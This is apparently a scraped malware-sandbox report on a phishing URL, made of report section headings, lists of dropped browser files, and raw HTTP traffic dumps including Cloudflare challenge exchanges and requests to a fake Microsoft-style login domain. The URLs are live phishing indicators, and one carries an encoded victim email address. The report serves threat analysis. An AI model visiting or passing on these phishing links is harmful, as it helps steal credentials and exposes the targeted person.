2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 66 5a 74 2b 61 36 31 71 69 34 34 63 72 44 32 37 36 2f 37 37 54 77 78 66 58 43 78 2f 4c 76 39 4c 76 4b 73 37 6e 53 2b 50 72 58 77 4c 6f 4a 39 50 6e 5a 31 77 54 77 32 67 33 75 38 42 4c 74 35 4f 2f 71 35 50 6e 32 2b 65 73 55 46 66 6f 52 2b 74 77 47 33 78 7a 37 42 69 6b 6e 46 78 62 39 35 51 37 6f 2f 50 6f 43 41 78 55 51 45 79 50 77 46 44 30 58 50 79 77 72 50 30 4d 34 4d 52 55 79 2f 55 45 48 48 6b 67 4d 43 79 4a 41 4c 43 51 74 50 69 30 54 53 53 73 31 4b 69 67 32 4f 6a 51 55 48 68 39 50 51 44 55 75 4f 55 59 33 4a 55 4a 44 4f 45 78 59 53 6c 67 73 62 45 78 52 4b 33 52 67 56 6c 41 32 4d 48 56 6d 50 57 6c 72 56 6b 74 63 67 6a 35 79 5a 6b 46 64 64 33 64 49 66 6f 4a 71 54 59 65 48 63 46 43 42 61 57 64 67 6c 59 74 6f 69 6e 6c 6c 6e 6f 78 75 59 47 75 66 62 6f 52 68 65 Data Ascii: fZt+a61qi44crD276/77TwxfXCx/Lv9LvKs7nS+PrXwLoJ9PnZ1wTw2g3u8BLt5O/q5Pn2+esUFfoR+twG3xz7BiknFxb95Q7o/PoCAxUQEyPwFD0XPywrP0M4MRUy/UEHHkgMCyJALCQtPi0TSSs1Kig2OjQUHh9PQDUuOUY3JUJDOExYSlgsbExRK3RgVlA2MHVmPWlrVktcgj5yZkFdd3dIfoJqTYeHcFCBaWdglYtoinllnoxuYGufboRhe
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 6d 76 4c 6e 4a 7a 73 43 39 7a 64 4c 4f 39 65 32 33 30 4f 2f 52 36 66 75 36 39 75 36 38 39 4f 2f 34 75 51 6a 62 31 77 6a 35 36 4d 72 66 42 65 54 4b 44 4d 38 4f 39 73 38 4f 38 66 51 4e 35 2f 37 6d 39 50 62 59 32 78 54 62 46 79 48 36 32 67 41 71 46 52 59 45 4a 41 6f 76 47 2f 76 74 4e 42 49 4e 4c 77 51 7a 38 43 6a 32 50 76 37 33 4d 6a 33 38 50 44 63 54 51 7a 63 37 51 42 67 6d 4a 69 77 63 4b 45 63 6e 49 44 49 52 56 53 6b 51 4f 53 49 52 53 52 51 7a 4a 7a 35 4d 58 46 4a 51 51 47 55 2b 5a 43 46 57 5a 46 31 42 50 46 6b 39 4b 55 5a 4b 4c 43 73 6f 4b 55 42 32 61 57 68 78 5a 32 31 65 62 49 4a 35 57 44 5a 6b 50 34 5a 33 68 48 74 30 66 49 75 4f 57 59 35 4e 63 48 4e 69 61 6c 4a 73 69 55 39 37 6a 6f 64 34 6a 58 75 4c 57 70 36 43 6d 6e 74 6b 6f 71 46 36 59 70 75 6b 59 34 Data Ascii: mvLnJzsC9zdLO9e230O/R6fu69u689O/4uQjb1wj56MrfBeTKDM8O9s8O8fQN5/7m9PbY2xTbFyH62gAqFRYEJAovG/vtNBINLwQz8Cj2Pv73Mj38PDcTQzc7QBgmJiwcKEcnIDIRVSkQOSIRSRQzJz5MXFJQQGU+ZCFWZF1BPFk9KUZKLCsoKUB2aWhxZ21ebIJ5WDZkP4Z3hHt0fIuOWY5NcHNialJsiU97jod4jXuLWp6CmntkoqF6YpukY4
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 34 4d 61 76 31 65 33 61 32 63 58 39 32 38 33 7a 39 4f 48 52 33 66 6e 6d 35 63 63 41 31 2b 58 73 41 65 44 59 45 50 6e 6a 33 63 77 47 34 2b 48 30 42 4f 63 63 2f 41 33 73 48 79 41 53 39 76 44 69 34 51 63 43 35 78 7a 34 42 68 77 57 34 50 33 6e 43 52 73 53 4b 43 30 59 42 69 51 74 49 77 6f 65 4e 69 6b 7a 2f 44 6b 74 4f 52 4a 46 4b 44 77 71 4f 79 78 41 4c 6b 55 75 52 44 78 4b 4e 45 6b 69 53 7a 38 6d 52 45 34 37 46 56 42 4b 51 42 6f 75 57 45 74 43 58 46 35 52 52 6b 5a 62 54 43 51 70 62 56 41 2b 5a 48 46 64 61 45 70 74 57 45 5a 6b 5a 6d 4e 61 57 6e 5a 70 64 55 35 7a 61 33 6c 53 68 57 68 41 52 59 42 73 67 47 71 44 63 46 35 38 68 58 4e 4e 64 70 5a 32 6a 49 69 61 65 31 57 55 6a 34 42 75 6a 4a 69 4c 63 70 69 53 69 47 47 43 6f 49 79 67 6d 4b 36 58 6a 71 69 79 6d 36 64 Data Ascii: 4Mav1e3a2cX9283z9OHR3fnm5ccA1+XsAeDYEPnj3cwG4+H0BOcc/A3sHyAS9vDi4QcC5xz4BhwW4P3nCRsSKC0YBiQtIwoeNikz/DktORJFKDwqOyxALkUuRDxKNEkiSz8mRE47FVBKQBouWEtCXF5RRkZbTCQpbVA+ZHFdaEptWEZkZmNaWnZpdU5za3lShWhARYBsgGqDcF58hXNNdpZ2jIiae1WUj4BujJiLcpiSiGGCoIygmK6Xjqiym6d
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 4c 6a 7a 33 72 6a 56 39 75 50 34 31 66 33 6d 77 4f 45 41 36 51 41 41 41 2b 2f 75 33 52 4c 38 38 51 41 4e 2f 76 62 6c 42 67 50 70 39 52 59 48 46 66 45 59 43 2f 4c 78 48 41 67 62 35 42 30 54 2b 76 30 66 45 4f 67 53 4a 42 54 73 45 69 49 66 46 68 59 75 49 78 6f 65 4d 53 6b 65 4d 44 67 6b 48 50 77 79 42 7a 77 44 42 68 30 57 4f 79 38 6a 4c 69 4a 45 4e 45 67 69 51 68 63 31 46 78 46 45 58 53 55 31 45 54 35 67 58 45 51 38 48 47 4a 51 52 6c 78 67 56 57 41 70 61 6c 63 2b 55 6c 30 6c 55 56 4a 72 58 30 55 30 65 45 59 31 55 44 70 65 4f 56 70 32 62 46 4b 45 68 57 5a 57 64 48 39 30 67 45 6d 43 62 32 31 52 69 58 52 73 54 5a 46 4a 64 6c 68 32 61 5a 79 4d 6a 6c 39 2b 57 5a 71 4d 57 6f 4b 69 65 33 57 6e 6c 6e 69 46 71 34 6d 41 6f 49 4b 76 63 35 46 31 73 5a 2b 57 6b 71 6d 4f Data Ascii: Ljz3rjV9uP41f3mwOEA6QAAA+/u3RL88QAN/vblBgPp9RYHFfEYC/LxHAgb5B0T+v0fEOgSJBTsEiIfFhYuIxoeMSkeMDgkHPwyBzwDBh0WOy8jLiJENEgiQhc1FxFEXSU1ET5gXEQ8HGJQRlxgVWApalc+Ul0lUVJrX0U0eEY1UDpeOVp2bFKEhWZWdH90gEmCb21RiXRsTZFJdlh2aZyMjl9+WZqMWoKie3WnlniFq4mAoIKvc5F1sZ+WkqmO

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Windows Analysis Report
http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:33 UTC	1176	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34775 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:33 UTC	16384	OUT	Data Raw: 76 5f 39 30 36 62 36 61 61 34 31 64 32 34 34 34 30 35 3d 38 37 79 51 30 54 55 59 6b 79 79 57 71 65 59 54 2d 34 43 34 4a 65 52 55 25 32 62 34 75 34 55 30 53 48 52 59 47 55 4a 34 52 24 65 47 55 58 34 54 2d 48 34 59 34 62 59 51 4d 43 79 65 37 33 24 34 4b 52 34 63 67 79 34 75 34 65 71 34 4a 34 52 41 71 34 73 51 65 35 34 4a 45 4e 41 5a 4f 34 49 24 57 4e 34 65 47 39 6f 4f 34 2d 48 34 4d 34 62 24 53 24 77 34 57 30 39 64 47 74 51 54 71 55 30 34 38 71 55 4d 49 68 30 37 34 65 62 71 71 55 7a 63 63 61 6d 24 34 38 6b 51 59 6f 4c 54 4f 34 34 6a 55 47 4f 72 24 47 49 41 34 52 37 34 72 73 36 4e 77 69 61 39 2d 69 2d 41 44 36 24 68 47 63 45 41 31 6b 73 36 59 61 34 34 68 47 6b 35 34 79 4b 47 7a 6d 67 63 71 66 6f 41 7a 6b 62 64 39 4b 67 76 34 4c 45 62 56 69 6f 56 6e 2d 43 5a Data Ascii: v_906b6aa41d244405=87yQ0TUYkyyWqeYT-4C4JeRU%2b4u4U0SHRYGUJ4R$eGUX4T-H4Y4bYQMCye73$4KR4cgy4u4eq4J4RAq4sQe54JENAZO4I$WN4eG9oO4-H4M4b$S$w4W09dGtQTqU048qUMIh074ebqqUzccam$48kQYoLTO44jUGOr$GIA4R74rs6Nwia9-i-AD6$hGcEA1ks6Ya44hGk54yKGzmgcqfoAzkbd9Kgv4LEbVioVn-CZ
2025-01-23 23:03:33 UTC	16384	OUT	Data Raw: 50 4d 79 63 79 2d 44 53 71 79 48 34 6b 51 34 34 70 66 31 6c 7a 54 34 45 6a 51 76 37 38 34 34 51 34 67 75 6f 59 57 56 34 78 71 33 64 51 49 79 7a 51 65 6c 37 6c 78 31 6b 32 37 54 4d 4b 53 34 49 51 34 4f 51 4e 34 32 51 54 7a 34 39 34 52 59 57 2d 34 61 6b 32 79 54 79 51 73 67 34 48 55 53 34 69 34 65 51 55 59 34 50 53 7a 79 57 53 34 57 6b 54 34 55 41 34 4e 77 65 51 34 36 34 68 51 32 66 34 51 34 6a 51 79 71 34 66 34 63 34 35 37 55 71 24 43 51 61 71 55 33 34 53 37 33 37 54 6d 34 67 47 34 71 34 54 51 38 34 74 61 34 68 34 36 51 55 63 57 64 34 71 37 52 71 54 36 34 33 37 65 72 34 44 51 44 34 35 61 37 66 54 30 78 6f 2d 57 47 34 71 34 61 51 30 4c 34 30 51 52 6e 45 55 78 5a 44 45 2d 34 48 34 77 51 61 51 54 72 63 35 34 65 6b 54 4e 34 30 51 68 34 34 56 63 6e 79 52 24 57 Data Ascii: PMycy-DSqyH4kQ44pf1lzT4EjQv7844Q4guoYWV4xq3dQIyzQel7lx1k27TMKS4IQ4OQN42QTz494RYW-4ak2yTyQsg4HUS4i4eQUY4PSzyWS4WkT4UA4NweQ464hQ2f4Q4jQyq4f4c457Uq$CQaqU34S737Tm4gG4q4TQ84ta4h46QUcWd4q7RqT6437er4DQD45a7fT0xo-WG4q4aQ0L40QRnEUxZDE-4H4wQaQTrc54ekTN40Qh44VcnyR$W
2025-01-23 23:03:33 UTC	2007	OUT	Data Raw: 62 34 67 71 24 71 57 37 67 4d 52 55 52 48 79 34 76 48 32 73 52 71 30 74 34 35 44 35 35 48 2b 48 4c 47 52 41 51 4a 4c 59 6c 61 39 51 55 77 4f 65 55 30 51 2b 48 4c 59 34 53 34 58 34 79 41 70 55 78 52 51 61 33 66 48 45 68 76 71 71 63 2d 34 38 72 59 77 65 74 75 4c 6b 57 37 34 39 4c 63 4c 50 6d 70 36 34 45 4c 4e 34 54 7a 34 68 79 58 66 34 61 6d 4d 64 51 48 54 7a 34 71 51 38 6e 2b 39 37 55 52 4e 63 65 65 6d 36 24 68 5a 34 74 48 4a 6b 32 79 54 6b 56 43 2d 61 51 34 5a 4c 51 6b 56 64 34 41 51 76 48 52 34 43 48 34 43 34 49 72 56 36 77 6a 34 74 31 33 71 4c 33 34 35 47 54 4b 34 4b 79 6a 71 55 6b 53 33 34 49 4e 54 77 34 41 24 68 79 54 33 34 2b 71 71 71 52 45 58 39 34 57 34 34 75 77 6b 31 62 70 5a 32 67 4a 51 79 47 57 55 78 61 51 4c 6b 55 51 6d 6e 34 34 4c 56 36 35 24 Data Ascii: b4gq$qW7gMRURHy4vH2sRq0t45D55H+HLGRAQJLYla9QUwOeU0Q+HLY4S4X4yApUxRQa3fHEhvqqc-48rYwetuLkW749LcLPmp64ELN4Tz4hyXf4amMdQHTz4qQ8n+97URNceem6$hZ4tHJk2yTkVC-aQ4ZLQkVd4AQvHR4CH4C4IrV6wj4t13qL345GTK4KyjqUkS34INTw4A$hyT34+qqqREX94W44uwk1bpZ2gJQyGWUxaQLkUQmn44LV65$
2025-01-23 23:03:33 UTC	1244	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4936 Connection: close cf-chl-out-s: kbaVYfqnhPN5c/jmnUT9F2FLUvkqHARBqLHPWN+nA0PtdGEZRKWEP9BATTjxIWTvpFIoOFeoiyTza8fHh169DnfZ5H8WUw7ga1be8EIpXia7356oD5EBIHSfmLk+1YJbxsSgHSmBkCLlHAloE6vRNcncO/q/SJnpV9q+NT3p/jsvb6L/2F7Vf5LaqCZwiOxwWIFBM2FpLBh28RFw7uegCHHVr6BiKDpYGoZj0zn9d+UqVB7EX7rpwv1uAs0kvX5lhz10fK8o88Xsb/7r3AMC7iviY0Yml/Kmoy3YZurZH+n+XneY3HxGgxYrSuc2qR5tRVpF6/lxOqHLPQFwQcjR8RQ4yOm8X/byrNY59lcB5q8W7JBP4Xnl39fKRt1y50zLEo33sJ9urTjw3R6nJIZBhVQN9Q9xVq3ebW8+JGvOhETR1pfOLJSyg2ukL3ZTuEvD+AZYMgGh3Vpl88Gqb+TSEqPIK8s0JpYAC5i+rZZVxHJjEJpFTfuSUy2dNG2PrYU1Fn8WyHGlASf41WQ+CU+O5p0g+yqsJnppWp9VXtESQeKBYuJ/p3fw0FXWsKBarITVxx9cm1PD4KPhWZpjTf1H1B0CBzWZIgkUn890vgVSl8RbQ9vdjhfKGfyHwP9UFBpJhANn/WCEBiEcHjdtUNLepILElDkHd82kWqw9IEIMXR69WTDoioKPUYF53ud/o5t6bsbowCo0vouTaRYCgHJYaP9XKF/Q1eJ4Q65bWvRg/kVeZU0OQJJqvOp53aQaaDbv6d368FrbUDDwRF57avUJem6ArNBhFg6AYRyOQflY4GenHyPdB9si5Pd21VT/h+TlAMRzxqhBlIN2wab4OWuFstygWWLwoqkro0B8G7f6Jja+TZtxRc0GKBCDc8q/8okojUUByZHix4MyKVHSkogRTGy0hHnOoigz8bmcg2aadfKxg+XWX+l76H2SVdlwzeWBoJYyuwUl90cD5Af4/r0UtXoKwn+DlAjko1wtDRXnFiIvtsKA54 [TRUNCATED]
2025-01-23 23:03:33 UTC	229	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 39 71 51 45 6a 61 2b 6a 31 41 66 48 55 4e 78 33 52 58 4b 2b 63 63 57 4f 47 71 31 55 73 76 36 70 54 36 6e 2f 37 67 6a 72 76 62 7a 6e 63 61 69 58 44 48 34 75 32 32 33 33 37 37 43 39 4e 31 36 6a 46 37 6f 66 31 72 36 4d 55 76 50 70 50 35 4b 48 2f 5a 4d 42 31 37 4a 79 2f 6d 4a 2f 74 6b 77 61 49 34 69 76 59 71 46 6f 51 50 6b 3d 24 62 6a 35 72 48 34 32 6b 30 31 30 2f 39 6a 79 56 50 6a 70 32 4e 67 3d 3d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 36 62 36 61 66 33 35 61 34 36 64 65 39 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: cf-chl-out: 9qQEja+j1AfHUNx3RXK+ccWOGq1Usv6pT6n/7gjrvbzncaiXDH4u223377C9N16jF7of1r6MUvPpP5KH/ZMB17Jy/mJ/tkwaI4ivYqFoQPk=$bj5rH42k010/9jyVPjp2Ng==Server: cloudflareCF-RAY: 906b6af35a46de97-EWRalt-svc: h3=":443"; ma=86400
2025-01-23 23:03:33 UTC	1265	IN	Data Raw: 6b 4a 61 41 75 38 43 43 67 35 62 47 73 73 61 59 79 4d 4c 4c 72 34 62 4f 75 36 47 46 6e 4d 71 4e 6a 62 43 74 6b 63 69 6e 32 64 37 4b 77 4b 76 42 30 35 62 69 30 4d 65 6c 76 61 6e 4b 33 75 53 37 7a 75 4c 6f 79 63 32 73 73 63 7a 4d 2b 63 33 47 78 76 62 33 32 38 37 77 37 2f 76 57 39 41 54 76 30 64 49 46 42 51 72 6a 35 41 66 4b 30 4d 38 44 79 2b 6e 4f 38 75 54 59 46 50 48 6e 47 76 33 79 36 2f 6a 30 34 66 72 74 2b 50 48 31 4b 43 41 64 39 2b 49 43 4c 51 50 36 43 69 38 42 2f 51 73 70 4d 42 63 31 38 53 6e 33 4a 67 6b 73 2f 52 77 58 4d 6a 73 59 48 7a 6b 2f 53 78 38 47 46 69 55 68 53 79 55 77 43 6c 45 2f 4b 68 45 75 46 43 77 6f 52 44 6b 6e 48 45 46 55 4e 31 41 2b 56 6a 73 32 4f 43 56 63 4b 46 67 38 51 6b 70 5a 59 46 35 6c 62 6d 56 4b 52 6c 5a 59 4d 31 4d 32 62 44 31 Data Ascii: kJaAu8CCg5bGssaYyMLLr4bOu6GFnMqNjbCtkcin2d7KwKvB05bi0MelvanK3uS7zuLoyc2ssczM+c3Gxvb3287w7/vW9ATv0dIFBQrj5AfK0M8Dy+nO8uTYFPHnGv3y6/j04frt+PH1KCAd9+ICLQP6Ci8B/QspMBc18Sn3Jgks/RwXMjsYHzk/Sx8GFiUhSyUwClE/KhEuFCwoRDknHEFUN1A+Vjs2OCVcKFg8QkpZYF5lbmVKRlZYM1M2bD1
2025-01-23 23:03:33 UTC	1369	IN	Data Raw: 56 56 6a 65 7a 74 77 65 45 78 4c 53 33 73 2b 57 56 39 69 65 55 64 6b 53 58 31 6f 57 6b 74 47 61 32 36 49 65 32 31 68 54 57 4e 77 69 32 61 44 62 35 32 51 63 33 31 74 65 70 31 38 6f 5a 4e 67 6b 4a 71 66 5a 59 69 48 6a 57 69 58 66 71 70 72 6b 5a 4b 4f 74 59 79 72 6a 58 61 6a 73 4b 69 32 6e 37 53 68 66 36 4b 50 6f 72 47 6a 66 73 53 70 70 61 71 4a 72 61 72 4e 7a 34 79 78 73 71 37 53 73 4d 79 36 73 72 4b 36 7a 74 2b 66 76 4c 36 78 78 4d 48 59 75 4c 32 67 33 71 62 56 74 38 62 75 79 2b 33 6e 71 63 37 4c 35 50 62 56 31 4e 4c 52 34 38 6e 4d 76 64 33 78 2f 72 76 66 76 62 76 45 36 4f 55 41 78 75 58 44 35 75 7a 35 33 73 76 4c 38 64 38 46 44 41 49 4e 2b 64 45 45 43 68 55 65 33 39 6b 4c 4a 41 50 76 47 4f 59 46 48 41 4d 6b 43 75 4d 70 41 67 59 65 45 77 55 4e 4b 67 4d 33 Data Ascii: VVjeztweExLS3s+WV9ieUdkSX1oWktGa26Ie21hTWNwi2aDb52Qc31tep18oZNgkJqfZYiHjWiXfqprkZKOtYyrjXajsKi2n7Shf6KPorGjfsSppaqJrarNz4yxsq7SsMy6srK6zt+fvL6xxMHYuL2g3qbVt8buy+3nqc7L5PbV1NLR48nMvd3x/rvfvbvE6OUAxuXD5uz53svL8d8FDAIN+dEEChUe39kLJAPvGOYFHAMkCuMpAgYeEwUNKgM3
2025-01-23 23:03:33 UTC	1369	IN	Data Raw: 68 2f 61 54 32 43 66 44 35 74 59 45 4a 66 59 56 74 49 5a 6d 56 37 69 30 68 4f 62 6d 31 69 68 4a 5a 76 63 34 53 4d 5a 33 4e 78 56 49 32 59 64 33 46 63 6b 56 78 2b 68 6f 6c 62 6e 4a 6c 69 6d 4b 65 77 6f 47 69 6b 63 61 4b 49 62 49 4f 51 63 49 53 48 6c 37 71 5a 6a 58 65 30 67 71 79 61 6e 5a 2f 48 68 72 71 70 6d 59 4f 36 78 70 6d 71 6e 4c 71 63 30 5a 53 6c 6c 37 44 4c 75 37 54 49 6b 38 76 4f 76 4b 2f 67 74 62 44 4e 74 64 53 35 35 74 6a 61 74 74 6d 74 36 36 7a 65 34 37 48 45 39 63 53 77 79 39 58 45 79 4e 48 79 2b 67 48 64 37 72 2f 32 34 39 50 42 42 76 54 7a 43 77 33 67 43 2b 41 50 7a 2b 44 73 79 75 67 50 36 78 58 74 35 2b 73 63 32 77 66 7a 49 42 73 62 2b 79 54 34 32 77 44 78 42 2b 54 7a 36 52 6b 4f 36 52 73 53 42 44 4c 38 41 78 38 43 43 50 51 4b 2b 54 51 50 44 Data Ascii: h/aT2CfD5tYEJfYVtIZmV7i0hObm1ihJZvc4SMZ3NxVI2Yd3FckVx+holbnJlimKewoGikcaKIbIOQcISHl7qZjXe0gqyanZ/HhrqpmYO6xpmqnLqc0ZSll7DLu7TIk8vOvK/gtbDNtdS55tjattmt66ze47HE9cSwy9XEyNHy+gHd7r/249PBBvTzCw3gC+APz+DsyugP6xXt5+sc2wfzIBsb+yT42wDxB+Tz6RkO6RsSBDL8Ax8CCPQK+TQPD
2025-01-23 23:03:33 UTC	933	IN	Data Raw: 39 57 6d 4a 41 58 6d 74 6f 61 6d 31 34 65 49 4a 69 69 58 53 47 67 49 6d 41 55 58 70 74 64 31 4f 59 65 49 65 68 64 70 70 2b 66 5a 53 5a 68 6e 53 63 69 34 61 74 6c 32 6c 39 6f 35 4b 48 6b 4c 4f 6e 63 35 4f 56 67 6f 79 4b 69 70 56 36 6a 4d 47 30 6b 59 2f 46 6d 70 4b 77 6c 35 71 69 6f 62 32 38 7a 61 69 5a 78 4e 4b 30 6f 61 32 4e 72 62 58 59 75 37 53 6f 31 4d 69 73 30 39 44 59 7a 4c 44 67 74 62 37 45 6f 62 72 4d 70 4d 62 72 30 4b 6e 53 32 38 2f 43 39 50 58 45 2b 65 54 45 32 73 6e 6e 76 4e 58 63 39 37 72 59 39 76 54 51 37 39 4d 4a 39 64 6e 2b 41 64 2f 6f 45 41 58 74 2f 41 6a 69 38 2b 7a 6a 2b 66 6f 47 44 76 34 49 43 43 4c 31 34 67 37 77 42 78 41 43 4b 42 77 70 43 68 2f 6f 43 78 67 6c 45 78 30 49 2f 53 6b 33 49 69 77 78 4e 52 44 31 4e 54 6f 66 48 6a 30 6a 4a 52 Data Ascii: 9WmJAXmtoam14eIJiiXSGgImAUXptd1OYeIehdpp+fZSZhnSci4atl2l9o5KHkLOnc5OVgoyKipV6jMG0kY/FmpKwl5qiob28zaiZxNK0oa2NrbXYu7So1Mis09DYzLDgtb7EobrMpMbr0KnS28/C9PXE+eTE2snnvNXc97rY9vTQ79MJ9dn+Ad/oEAXt/Aji8+zj+foGDv4ICCL14g7wBxACKBwpCh/oCxglEx0I/Sk3IiwxNRD1NTofHj0jJR

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:34 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:34 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Thu, 23 Jan 2025 23:03:34 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: hE3+qKbIxEn80KFc4mYkisvRJr78MJQOjJN5lOkOHbXOK5hsxCFmWkbGjK51YNvo3wXuefI/3ox/PS5p2FXynQ==$EJpRil3VuWrjXm1Z3TnuOQ== Server: cloudflare CF-RAY: 906b6af82bd30f73-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:34 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:41 UTC	855	OUT	GET /FgJIoRDm?q=P2pqOTI HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://login.loraintoolsltd.xyz/FgJIoRDm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd
2025-01-23 23:03:42 UTC	20	IN	HTTP/1.1 302 Found
2025-01-23 23:03:42 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:42 UTC	25	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a Data Ascii: Content-Type: text/html
2025-01-23 23:03:42 UTC	45	IN	Data Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 2f 0d 0a Data Ascii: Location: https://login.loraintoolsltd.xyz/
2025-01-23 23:03:42 UTC	28	IN	Data Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a Data Ascii: Transfer-Encoding: chunked
